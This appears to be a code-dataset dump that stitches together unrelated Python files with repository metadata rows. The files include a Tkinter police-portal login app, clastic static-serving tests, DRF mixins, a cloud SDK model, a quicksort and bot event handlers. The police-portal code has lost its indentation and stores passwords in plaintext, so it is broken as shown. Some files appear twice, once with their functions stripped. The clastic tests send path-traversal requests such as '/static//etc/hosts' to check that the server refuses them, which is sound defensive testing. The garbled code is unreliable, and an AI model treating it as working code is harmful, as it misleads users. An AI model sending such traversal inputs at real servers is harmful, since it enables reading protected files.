cursor.execute('CREATE TABLE IF NOT EXISTS POLICE(POLICEID TEXT PRIMARY KEY CHECK(POLICEID <> ""), PASSWORD TEXT NOT NULL CHECK(PASSWORD <> ""),FNAME TEXT NOT NULL CHECK(FNAME <> ""), MNAME TEXT, LNAME TEXT NOT NULL CHECK(LNAME <> ""), PHOTO BLOB NOT NULL, LASTLOGIN TEXT, EMAILID TEXT NOT NULL CHECK(EMAILID <> ""), JURISDICTION TEXT NOT NULL CHECK(JURISDICTION <> ""), ADDRESS TEXT NOT NULL CHECK(ADDRESS <> ""), GENDER TEXT NOT NULL CHECK(GENDER <> ""), DOB TEXT NOT NULL CHECK(DOB <> ""), BATCH TEXT NOT NULL CHECK(BATCH <> ""), RANK TEXT NOT NULL CHECK(RANK <> ""), MARITALSTATUS TEXT NOT NULL)')
cursor.execute("""CREATE TABLE IF NOT EXISTS POLICE1(POLICEID TEXT, CONTACT TEXT NOT NULL, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS COMPLAINT (COMPLAINT_NO text PRIMARY KEY, PLACEOFCRIME text NOT NULL CHECK(PLACEOFCRIME <> ''), TIMEOFCRIME text, CRIMEDESCRIPTION text, CITY text, POLICESTATION text, STATUS text, VFNAME text, VMNAME text, VLNAME text, AFNAME text, AMNAME text, ALNAME text, USERID text, FOREIGN KEY(USERID) REFERENCES CIVILIAN1(USERID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS CIVILIAN1 (USERID text PRIMARY KEY CHECK(USERID <> ''), PASSWORD text NOT NULL CHECK(PASSWORD <> ''), FNAME text, MNAME text, LNAME text, DOB text, GENDER text, MARITALSTATUS text, EMAILID text NOT NULL, OCCUPATION text, ADDRESS text, LASTLOGIN text, PHOTO blob)""")
cursor.execute('CREATE TABLE IF NOT EXISTS CIVILIAN2 (USERID text , CONTACT number,FOREIGN KEY (USERID) REFERENCES CIVILIAN1(USERID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL(CRIMINALID number PRIMARY KEY, FNAME text, MNAME text, LNAME text, DOB text, BLOODGROUP text, STATUS text, PRIORITY number, GENDER text, PHOTO BLOB NOT NULL)')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE1 (CASENO number PRIMARY KEY, PENALCODETYPE text, SECTIONNUMBER number, POLICESTATION text, DESCRIPTION text NOT NULL, OPENDATE text NOT NULL, CLOSEDATE text, COMPLAINT_NO TEXT, FOREIGN KEY (COMPLAINT_NO) REFERENCES COMPLAINT(COMPLAINT_NO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL3 (CRIMINALID text, CONTACT text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE2(CASENO number, POLICEID text, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID), FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE3(CASENO number , VFNAME text, VMNAME text, VLNAME text, VAGE number, VADDRESS text, FOREIGN KEY (CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE4(CASENO number, FIRNO number, FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO), FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL2(CRIMINALID text, ADDRESS text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL1 (CRIMINALID text, IDENTIFICATIONMARKS text,FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME2 (FIRNO number, CRIMINALID number, FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO), FOREIGN KEY(CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME3 (FIRNO number, PENALCODETYPE text, SECTIONNUMBER number, FOREIGN KEY (FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute( 'CREATE TABLE IF NOT EXISTS CRIME(FIRNO number PRIMARY KEY, DAMAGEAMOUNT number, INJURED number, DEATHS number, DATEOFCRIME text NOT NULL, PLACEOFCRIME text)')
connection.commit()
t=tk.Tk()
t.title('NCDS')
t.configure(background = 'white')
#t.geometry("1500x800+30+30")
w, h = t.winfo_screenwidth(), t.winfo_screenheight()
t.geometry("%dx%d+0+0" % (w, h))
#fontStyle = tkFont.Font(family="Times New Roman", size=60)
def enter():
getuid = uid.get()
getpswd = pswd.get()
if v.get()=='Civilian':
u = cursor.execute('SELECT USERID FROM CIVILIAN1 where USERID=(?) and PASSWORD=(?)', (getuid,getpswd))
temp=u.fetchall()
        if len(temp) > 0 and getuid == temp[0][0]:  # check for a non-empty result before indexing into it
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
civ_home(getuid)
else:
tkinter.messagebox.showinfo('Alert','Incorrect Username or Password')
elif v.get()=='Police':
u = cursor.execute('SELECT POLICEID,RANK FROM POLICE where POLICEID=(?) and PASSWORD=(?)', (getuid,getpswd))
temp=u.fetchall()
if len(temp)>0:
if getuid == temp[0][0]:
if temp[0][1] == 'ACP':
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
acp_home(getuid)
elif temp[0][1] == 'CONSTABLE':
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
const_home(getuid)
elif temp[0][1] == 'SYSTEM ADMINISTRATOR':
tkinter.messagebox.showinfo('Title','Logged_In')
clear()
t.destroy()
system_home(getuid)
else:
tkinter.messagebox.showinfo('Alert','Incorrect Username or Password')
else:
tkinter.messagebox.showinfo('Alert','Incorrect Username or Password')
else:
tkinter.messagebox.showinfo('Title','Choose User Type')
def clear():
uid.delete(0, 'end')
pswd.delete(0, 'end')
v.set('User Type')
return
def register():
t.destroy()
os.system('python registration_page.py')
return
def close():
try:
for i in range(6):
os.remove('z'+str(i)+'.jpg')
except:
pass
t.destroy()
import sys
sys.exit()
return
OptionList=['Police','Civilian']
v = tk.StringVar(t)
v.set('Select User Type'.upper())
opt = tk.OptionMenu(t, v, *OptionList)
fing=tkFont.Font(family="Times New Roman", size=16)
opt.configure(relief="solid",font=tkFont.Font(family="Times New Roman", size=20))
impmsg=Label(t, text='WELCOME TO POLICE PORTAL',bg='black', fg='white',font=tkFont.Font(family="Times New Roman", size=60), borderwidth=2, relief="solid")
wanted=Label(t, text='T O P W A N T E D', fg='red',font=tkFont.Font(family="Times New Roman", size=40), borderwidth=2, relief="solid")
detail=Label(t, text='Enter Below details to Login',bg='white',fg='black',font=tkFont.Font(family="Times New Roman", size=20), borderwidth=2, relief="solid")
user=Label(t, text='USER ID ',font=fing,borderwidth=2, relief="solid")
password=Label(t, text='PASSWORD',font=fing, borderwidth=2,relief="solid")
uid=Entry(t,font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
pswd=Entry(t,show='*',font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
submit=Button(t, text='SUBMIT', command=enter,font=fing, borderwidth=2, relief="solid")
reset=Button(t, text='CLEAR', command=clear,font=fing, borderwidth=2, relief="solid")
signup=Button(t, text='REGISTER', command=register, borderwidth=2, relief="solid")
close=Button(t, text='EXIT', command=close, font=fing,borderwidth=2, relief="solid")
signup.configure(font=("Times New Roman",25,'bold'))
f=cursor.execute('SELECT PHOTO from CRIMINAL order by priority')
temp=f.fetchall()
plist=[]
if len(temp)>=6:
for i in range(6):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
else:
for i in range(len(temp)):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
    for i in range(len(temp), 6):  # pad the remaining slots with the placeholder image
plist.append('demo.jpg')
t.load1 = Image.open(plist[0])
t.load1 = t.load1.resize((200, 200), Image.ANTIALIAS)
t.photo1 = ImageTk.PhotoImage(t.load1, master=t)
t.img1 = Label(t, image=t.photo1, borderwidth=2, relief="solid")
t.img1.image = t.photo1
t.load2 = Image.open(plist[1])
t.load2 = t.load2.resize((200, 200), Image.ANTIALIAS)
t.photo2 = ImageTk.PhotoImage(t.load2, master=t)
t.img2 = Label(t, image=t.photo2, borderwidth=2, relief="solid")
t.img2.image = t.photo2
t.load3 = Image.open(plist[2])
t.load3 = t.load3.resize((200, 200), Image.ANTIALIAS)
t.photo3 = ImageTk.PhotoImage(t.load3, master=t)
t.img3 = Label(t, image=t.photo3, borderwidth=2, relief="solid")
t.img3.image = t.photo3
t.load4 = Image.open(plist[3])
t.load4 = t.load4.resize((200, 200), Image.ANTIALIAS)
t.photo4 = ImageTk.PhotoImage(t.load4, master=t)
t.img4 = Label(t, image=t.photo4, borderwidth=2, relief="solid")
t.img4.image = t.photo4
t.load5 = Image.open(plist[4])
t.load5 = t.load5.resize((200, 200), Image.ANTIALIAS)
t.photo5 = ImageTk.PhotoImage(t.load5, master=t)
t.img5 = Label(t, image=t.photo5, borderwidth=2, relief="solid")
t.img5.image = t.photo5
t.load6 = Image.open(plist[5])
t.load6 = t.load6.resize((200, 200), Image.ANTIALIAS)
t.photo6 = ImageTk.PhotoImage(t.load6, master=t)
t.img6 = Label(t, image=t.photo6, borderwidth=2, relief="solid")
t.img6.image = t.photo6
impmsg.place(x=0, y=5, width=w, height=100)
wanted.place(x=600, y=160, width=800, height=70)
detail.place(x=90 , y=200, width=410, height=75)
opt.place(x = 90, y = 300 , width=410, height=70)
user.place(x = 90, y = 380 , width=200, height=70)
uid.place(x = 300, y = 380 , width=200, height=70)
password.place(x = 90, y = 460 , width=200, height=70)
pswd.place(x = 300, y = 460 , width=200, height=70)
submit.place(x = 90, y = 540, width=200, height=70)
reset.place(x = 300, y = 540 , width=200, height=70)
signup.place(x= 90, y = 630, width = 200, height = 70)
close.place(x= 300, y = 630, width = 200, height = 70)
t.img1.place(x = 600, y = 250 , width=200, height=200)
t.img2.place(x = 900, y = 250 , width=200, height=200)
t.img3.place(x = 1200, y = 250 , width=200, height=200)
t.img4.place(x = 600, y = 500 , width=200, height=200)
t.img5.place(x = 900, y = 500 , width=200, height=200)
t.img6.place(x = 1200, y = 500 , width=200, height=200)
mainloop()
| 1,993 | 0 | 100 |
f4d07cab853998e94b41d3ffb56b1ab1d49e28bb | 1,470 | py | Python | clastic/tests/test_static.py | mahmoud/clastic | 4dd03cc25247dcedbb3e0cd1089bef8eefd32bf7 | [
"BSD-3-Clause"
] | 140 | 2015-02-11T19:03:30.000Z | 2022-03-12T23:30:46.000Z | clastic/tests/test_static.py | mahmoud/clastic | 4dd03cc25247dcedbb3e0cd1089bef8eefd32bf7 | [
"BSD-3-Clause"
] | 21 | 2015-09-16T04:33:09.000Z | 2021-11-08T04:46:32.000Z | clastic/tests/test_static.py | mahmoud/clastic | 4dd03cc25247dcedbb3e0cd1089bef8eefd32bf7 | [
"BSD-3-Clause"
] | 22 | 2015-09-15T19:30:06.000Z | 2021-11-05T17:22:20.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from clastic import Application, StaticApplication, StaticFileRoute
_CUR_DIR = os.path.dirname(os.path.abspath(__file__))
| 34.186047 | 109 | 0.664626 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from clastic import Application, StaticApplication, StaticFileRoute
_CUR_DIR = os.path.dirname(os.path.abspath(__file__))
def test_basic_static_serve():
static_app = StaticApplication(_CUR_DIR)
app = Application([('/static/', static_app)])
c = app.get_local_client()
resp = c.get('/static/test_static.py')
assert resp.mimetype in ('text/x-python', 'text/plain') # text/plain on appveyor/windows for some reason
resp = c.get('/static/does_not_exist.txt')
assert resp.status_code == 404
resp = c.get('/static/../core.py')
assert resp.status_code == 403
resp = c.get('/static/_ashes_tmpls/basic_template.html')
assert resp.status_code == 200
resp = c.get('/static/_ashes_tmpls/../../core.py')
assert resp.status_code == 403
# check that we don't navigate to root
resp = c.get('/static//etc/hosts')
if os.path.exists('/etc/hosts'):
assert resp.status_code == 403
else:
assert resp.status_code == 404 # mostly windows
def test_basic_static_route():
static_app = Application([StaticFileRoute('/source_code',
_CUR_DIR + '/test_static.py')])
c = static_app.get_local_client()
resp = c.get('/source_code')
assert resp.mimetype in ('text/x-python', 'text/plain') # text/plain on appveyor/windows for some reason
assert resp.status_code == 200
| 1,223 | 0 | 46 |
27a69b32835653f5833e413c6df8b6d71ff2add8 | 296 | py | Python | rivalcfg/profiles/rival300csgofadeeditionstm32.py | BenJuan26/rivalcfg | a4b434147d4888aa35287a40b8aa0be9408a28f1 | [
"WTFPL"
] | null | null | null | rivalcfg/profiles/rival300csgofadeeditionstm32.py | BenJuan26/rivalcfg | a4b434147d4888aa35287a40b8aa0be9408a28f1 | [
"WTFPL"
] | 1 | 2020-05-09T06:12:34.000Z | 2020-07-31T23:58:55.000Z | rivalcfg/profiles/rival300csgofadeeditionstm32.py | BenJuan26/rivalcfg | a4b434147d4888aa35287a40b8aa0be9408a28f1 | [
"WTFPL"
] | null | null | null | from .rival300csgofadeedition import rival300csgofadeedition
rival300csgofadeeditionstm32 = {
"name": "SteelSeries Rival 300 CS:GO Fade Edition (stm32)",
"vendor_id": 0x1038,
"product_id": 0x1716,
"interface_number": 0,
"commands": rival300csgofadeedition["commands"],
}
| 21.142857 | 63 | 0.722973 | from .rival300csgofadeedition import rival300csgofadeedition
rival300csgofadeeditionstm32 = {
"name": "SteelSeries Rival 300 CS:GO Fade Edition (stm32)",
"vendor_id": 0x1038,
"product_id": 0x1716,
"interface_number": 0,
"commands": rival300csgofadeedition["commands"],
}
| 0 | 0 | 0 |
1642a81148ba8a39cfb9b6e7eaf0edc2d0068c45 | 2,942 | py | Python | venv/Lib/site-packages/rest_framework/mixins.py | RiccardoCherchi/Barcode-Stock | 699b977fa70ea14a7ac4d33bb7bb2f107aa2ca20 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/rest_framework/mixins.py | RiccardoCherchi/Barcode-Stock | 699b977fa70ea14a7ac4d33bb7bb2f107aa2ca20 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/rest_framework/mixins.py | RiccardoCherchi/Barcode-Stock | 699b977fa70ea14a7ac4d33bb7bb2f107aa2ca20 | [
"MIT"
] | null | null | null | """
Basic building blocks for generic class based views.
We don't bind behaviour to http method handlers yet,
which allows mixin classes to be composed in interesting ways.
"""
from rest_framework import status
from rest_framework.response import Response
from rest_framework.settings import api_settings
class CreateModelMixin:
"""
Create a model instance.
"""
class ListModelMixin:
"""
List a queryset.
"""
class RetrieveModelMixin:
"""
Retrieve a model instance.
"""
class UpdateModelMixin:
"""
Update a model instance.
"""
class DestroyModelMixin:
"""
Destroy a model instance.
"""
| 29.128713 | 89 | 0.670292 | """
Basic building blocks for generic class based views.
We don't bind behaviour to http method handlers yet,
which allows mixin classes to be composed in interesting ways.
"""
from rest_framework import status
from rest_framework.response import Response
from rest_framework.settings import api_settings
class CreateModelMixin:
"""
Create a model instance.
"""
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def perform_create(self, serializer):
serializer.save()
def get_success_headers(self, data):
try:
return {'Location': str(data[api_settings.URL_FIELD_NAME])}
except (TypeError, KeyError):
return {}
class ListModelMixin:
"""
List a queryset.
"""
def list(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
class RetrieveModelMixin:
"""
Retrieve a model instance.
"""
def retrieve(self, request, *args, **kwargs):
instance = self.get_object()
serializer = self.get_serializer(instance)
return Response(serializer.data)
class UpdateModelMixin:
"""
Update a model instance.
"""
def update(self, request, *args, **kwargs):
partial = kwargs.pop('partial', False)
instance = self.get_object()
serializer = self.get_serializer(instance, data=request.data, partial=partial)
serializer.is_valid(raise_exception=True)
self.perform_update(serializer)
if getattr(instance, '_prefetched_objects_cache', None):
# If 'prefetch_related' has been applied to a queryset, we need to
# forcibly invalidate the prefetch cache on the instance.
instance._prefetched_objects_cache = {}
return Response(serializer.data)
def perform_update(self, serializer):
serializer.save()
def partial_update(self, request, *args, **kwargs):
kwargs['partial'] = True
return self.update(request, *args, **kwargs)
class DestroyModelMixin:
"""
Destroy a model instance.
"""
def destroy(self, request, *args, **kwargs):
instance = self.get_object()
self.perform_destroy(instance)
return Response(status=status.HTTP_204_NO_CONTENT)
def perform_destroy(self, instance):
instance.delete()
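# Usage sketch (illustrative, not part of this module): the mixins above are
# meant to be combined with rest_framework.generics.GenericAPIView, which
# supplies get_queryset/get_serializer/get_object/paginate_queryset. The model
# and serializer names below are hypothetical.
#
#   from rest_framework import generics, mixins
#
#   class SnippetListCreateView(mixins.ListModelMixin,
#                               mixins.CreateModelMixin,
#                               generics.GenericAPIView):
#       queryset = Snippet.objects.all()
#       serializer_class = SnippetSerializer
#
#       def get(self, request, *args, **kwargs):
#           return self.list(request, *args, **kwargs)
#
#       def post(self, request, *args, **kwargs):
#           return self.create(request, *args, **kwargs)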
| 2,015 | 0 | 270 |
122e95d4baae685b706171f2dece5179f5075bb8 | 1,448 | py | Python | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/iam/models/PasswordPolicy.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 14 | 2018-04-19T09:53:56.000Z | 2022-01-27T06:05:48.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/iam/models/PasswordPolicy.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 15 | 2018-09-11T05:39:54.000Z | 2021-07-02T12:38:02.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/iam/models/PasswordPolicy.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 33 | 2018-04-20T05:29:16.000Z | 2022-02-17T09:10:05.000Z | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
| 36.2 | 114 | 0.70511 | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
class PasswordPolicy(object):
def __init__(self, length, age, expirationOperation, reusePrevention, retryTimes, validLoginDuration, rule, ):
"""
        :param length: Password length, 6-20 characters (default 8)
        :param age: Password validity period in days, 0-1095; 0 means the password never expires
        :param expirationOperation: How an expired password is reset: 0 - contact the primary account to reset it, 1 - the sub-user resets it after logging in
        :param reusePrevention: Password-history policy: forbid reusing the previous (0-10) passwords; 0 disables the check
        :param retryTimes: At most (1-16) wrong-password attempts are allowed within one hour
        :param validLoginDuration:
        :param rule: Password character types; the password must include at least one of them
"""
self.length = length
self.age = age
self.expirationOperation = expirationOperation
self.reusePrevention = reusePrevention
self.retryTimes = retryTimes
self.validLoginDuration = validLoginDuration
self.rule = rule
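# Illustrative construction only -- the numeric values and codes below are
# made-up placeholders; the accepted ranges/encodings for expirationOperation,
# validLoginDuration and rule come from the JD Cloud IAM documentation:
#
#   policy = PasswordPolicy(length=8, age=90, expirationOperation=1,
#                           reusePrevention=3, retryTimes=5,
#                           validLoginDuration=24, rule=1)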
| 0 | 956 | 23 |
46c492579f3a6a53a967d7c529429054efe10656 | 674 | py | Python | command/Assignment/Solution/security_commands.py | Tomvictor/python-design-patterns | 6b99607d721bbe03d26a0a451a10e88cd1c1d112 | [
"MIT"
] | null | null | null | command/Assignment/Solution/security_commands.py | Tomvictor/python-design-patterns | 6b99607d721bbe03d26a0a451a10e88cd1c1d112 | [
"MIT"
] | null | null | null | command/Assignment/Solution/security_commands.py | Tomvictor/python-design-patterns | 6b99607d721bbe03d26a0a451a10e88cd1c1d112 | [
"MIT"
] | null | null | null | from actions.security import Security
from command_abc import AbsCommand
| 24.071429 | 47 | 0.630564 | from actions.security import Security
from command_abc import AbsCommand
class SecurityArmCommand(AbsCommand):
def __init__(self, security):
if not isinstance(security, Security):
raise TypeError
self.security = security
def execute(self):
self.security.arm()
def undo(self):
self.security.disarm()
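# Typical Command-pattern usage (sketch; assumes Security() can be constructed
# with no arguments, and an invoker such as a remote/scheduler would normally
# hold the command object):
#
#   security = Security()
#   arm_command = SecurityArmCommand(security)
#   arm_command.execute()   # delegates to security.arm()
#   arm_command.undo()      # delegates to security.disarm()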
class SecurityDisarmCommand(AbsCommand):
def __init__(self, security):
if not isinstance(security, Security):
raise TypeError
self.security = security
def execute(self):
self.security.disarm()
def undo(self):
self.security.arm() | 342 | 35 | 219 |
346c9fbe4b8cd7d6a72238b1d822157888c23cd2 | 1,299 | py | Python | sorting/quicksort.py | nipuntalukdar/algodatasructs | a50058f355115b4d45864a04e0e0aa492f006d18 | [
"MIT"
] | null | null | null | sorting/quicksort.py | nipuntalukdar/algodatasructs | a50058f355115b4d45864a04e0e0aa492f006d18 | [
"MIT"
] | null | null | null | sorting/quicksort.py | nipuntalukdar/algodatasructs | a50058f355115b4d45864a04e0e0aa492f006d18 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
import random
j = 1
while j <= 1000:
x = [random.randint(0,999999999999) for i in range(0,j)]
y = [a for a in x]
z = [a for a in x]
y.sort()
quick_sort(x, 0, len(x) - 1)
if y != x:
print("Sorting failed for {}".format(z))
break
j += 1
print("Success on iteration {}".format(j - 1))
| 27.0625 | 64 | 0.461894 | def quick_sort(arr, start, end):
if start == end:
return
if end - start == 1:
if arr[start] > arr[end]:
arr[end], arr[start] = arr[start],arr[end]
return
i = start + 1
j = end
pivot = arr[start]
while i <= j:
if arr[i] <= pivot:
i += 1
continue
while arr[j] > pivot and j > i:
j -= 1
if j == i:
# all elements from index i are greater than pivot
break
#element a[j] < pivot, a[i] >= pivot , j > i
arr[j], arr[i] = arr[i], arr[j]
i += 1
j -= 1
# from index i onwards everything is >= pivot
# below index i, everything is < pivot
i -= 1
if i - start > 0:
arr[i], arr[start] = arr[start], arr[i]
quick_sort(arr, start, i - 1)
if i + 1 < end:
quick_sort(arr, i + 1, end)
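# Example: the sort is in place over the inclusive index range [start, end]:
#   data = [3, 1, 2]
#   quick_sort(data, 0, len(data) - 1)   # data becomes [1, 2, 3]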
if __name__ == '__main__':
import random
j = 1
while j <= 1000:
x = [random.randint(0,999999999999) for i in range(0,j)]
y = [a for a in x]
z = [a for a in x]
y.sort()
quick_sort(x, 0, len(x) - 1)
if y != x:
print("Sorting failed for {}".format(z))
break
j += 1
print("Success on iteration {}".format(j - 1))
| 867 | 0 | 22 |
f4ea2628c2086ae731105fbb0a4174a279be290e | 4,940 | py | Python | qqbot/core/network/ws/ws_intents_handler.py | tencent-connect/botpy | 275f96f0859b63110b095711838c738ad6a9cc1e | [
"MIT"
] | 63 | 2021-12-27T05:55:07.000Z | 2022-03-28T12:28:53.000Z | qqbot/core/network/ws/ws_intents_handler.py | tencent-connect/botpy | 275f96f0859b63110b095711838c738ad6a9cc1e | [
"MIT"
] | 9 | 2022-01-06T03:33:30.000Z | 2022-03-27T10:49:36.000Z | qqbot/core/network/ws/ws_intents_handler.py | tencent-connect/botpy | 275f96f0859b63110b095711838c738ad6a9cc1e | [
"MIT"
] | 12 | 2021-12-31T07:46:12.000Z | 2022-03-28T13:34:09.000Z | # -*- coding: utf-8 -*-
from enum import Enum
from qqbot.core.network.ws.ws_event import WsEvent
from qqbot.core.network.ws.ws_handler import DefaultHandler
def register_handlers(handlers):
"""
    RegisterHandlers registers the event callbacks and returns the intent bitmask used to authenticate the websocket connection
"""
intent = 0
for handler in handlers:
call_handler = intent_handler_dict.get(handler.type.value)
intent = intent | call_handler(handler.callback, intent)
return intent
intent_handler_dict = {
HandlerType.PLAIN_EVENT_HANDLER.value: plain_event_handler,
HandlerType.GUILD_EVENT_HANDLER.value: guild_event_handler,
HandlerType.GUILD_MEMBER_EVENT_HANDLER.value: guild_member_event_handler,
HandlerType.CHANNEL_EVENT_HANDLER.value: channel_event_handler,
HandlerType.MESSAGE_EVENT_HANDLER.value: message_event_handler,
HandlerType.MESSAGE_DELETE_EVENT_HANDLER.value: delete_message_event_handler,
HandlerType.AT_MESSAGE_EVENT_HANDLER.value: at_message_event_handler,
HandlerType.PUBLIC_MESSAGE_DELETE_EVENT_HANDLER.value: public_message_delete_event_handler,
HandlerType.DIRECT_MESSAGE_EVENT_HANDLER.value: direct_message_event_handler,
HandlerType.DIRECT_MESSAGE_DELETE_EVENT_HANDLER.value: delete_direct_message_event_handler,
HandlerType.AUDIO_EVENT_HANDLER.value: audio_event_handler,
HandlerType.MESSAGE_REACTIONS_EVENT_HANDLER.value: message_reactions_event_handler,
HandlerType.INTERACTION_CREATE_HANDLER.value: interaction_create_event_handler,
}
| 31.666667 | 95 | 0.777328 | # -*- coding: utf-8 -*-
from enum import Enum
from qqbot.core.network.ws.ws_event import WsEvent
from qqbot.core.network.ws.ws_handler import DefaultHandler
class Handler:
def __init__(self, handler_type, callback):
self.type = handler_type
self.callback = callback
def register_handlers(handlers):
"""
    RegisterHandlers registers the event callbacks and returns the intent bitmask used to authenticate the websocket connection
"""
intent = 0
for handler in handlers:
call_handler = intent_handler_dict.get(handler.type.value)
intent = intent | call_handler(handler.callback, intent)
return intent
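# Usage sketch: build Handler objects from a HandlerType and a user-supplied
# callback (the callback signature is defined by the SDK's dispatcher and is
# assumed here), then pass the returned intent bitmask to the websocket
# authentication step:
#
#   handlers = [Handler(HandlerType.AT_MESSAGE_EVENT_HANDLER, my_at_message_callback)]
#   intent = register_handlers(handlers)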
def plain_event_handler(callback, intent):
DefaultHandler.plain = callback
return intent
def guild_event_handler(callback, intent):
DefaultHandler.guild = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventGuildCreate, WsEvent.EventGuildDelete, WsEvent.EventGuildUpdate
)
return intent
def guild_member_event_handler(callback, intent):
DefaultHandler.guild_member = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventGuildMemberAdd,
WsEvent.EventGuildMemberRemove,
WsEvent.EventGuildMemberUpdate,
)
return intent
def audio_event_handler(callback, intent):
DefaultHandler.audio = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventAudioStart,
WsEvent.EventAudioFinish,
WsEvent.EventAudioOnMic,
WsEvent.EventAudioOffMic,
)
return intent
def channel_event_handler(callback, intent):
DefaultHandler.channel = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventChannelCreate,
WsEvent.EventChannelDelete,
WsEvent.EventChannelUpdate,
)
return intent
def message_event_handler(callback, intent):
DefaultHandler.message_create = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventMessageCreate)
return intent
def delete_message_event_handler(callback, intent):
DefaultHandler.message_delete = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventMessageDelete)
return intent
def at_message_event_handler(callback, intent):
DefaultHandler.at_message = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventAtMessageCreate)
return intent
def public_message_delete_event_handler(callback, intent):
DefaultHandler.public_message_delete = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventPublicMessageDelete)
return intent
def direct_message_event_handler(callback, intent):
DefaultHandler.direct_message_create = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventDirectMessageCreate)
return intent
def delete_direct_message_event_handler(callback, intent):
DefaultHandler.direct_message_delete = callback
intent = intent | WsEvent.event_to_intent(WsEvent.EventDirectMessageDelete)
return intent
def message_reactions_event_handler(callback, intent):
DefaultHandler.message_reaction = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventMessageReactionAdd,
WsEvent.EventMessageReactionRemove,
)
return intent
def interaction_create_event_handler(callback, intent):
DefaultHandler.interaction_create = callback
intent = intent | WsEvent.event_to_intent(
WsEvent.EventInteractionCreate
)
return intent
class HandlerType(Enum):
PLAIN_EVENT_HANDLER = 0
GUILD_EVENT_HANDLER = 1
GUILD_MEMBER_EVENT_HANDLER = 2
CHANNEL_EVENT_HANDLER = 3
MESSAGE_EVENT_HANDLER = 4
MESSAGE_DELETE_EVENT_HANDLER = 5
AT_MESSAGE_EVENT_HANDLER = 6
DIRECT_MESSAGE_EVENT_HANDLER = 7
DIRECT_MESSAGE_DELETE_EVENT_HANDLER = 8
AUDIO_EVENT_HANDLER = 9
MESSAGE_REACTIONS_EVENT_HANDLER = 10
PUBLIC_MESSAGE_DELETE_EVENT_HANDLER = 11
INTERACTION_CREATE_HANDLER = 12
intent_handler_dict = {
HandlerType.PLAIN_EVENT_HANDLER.value: plain_event_handler,
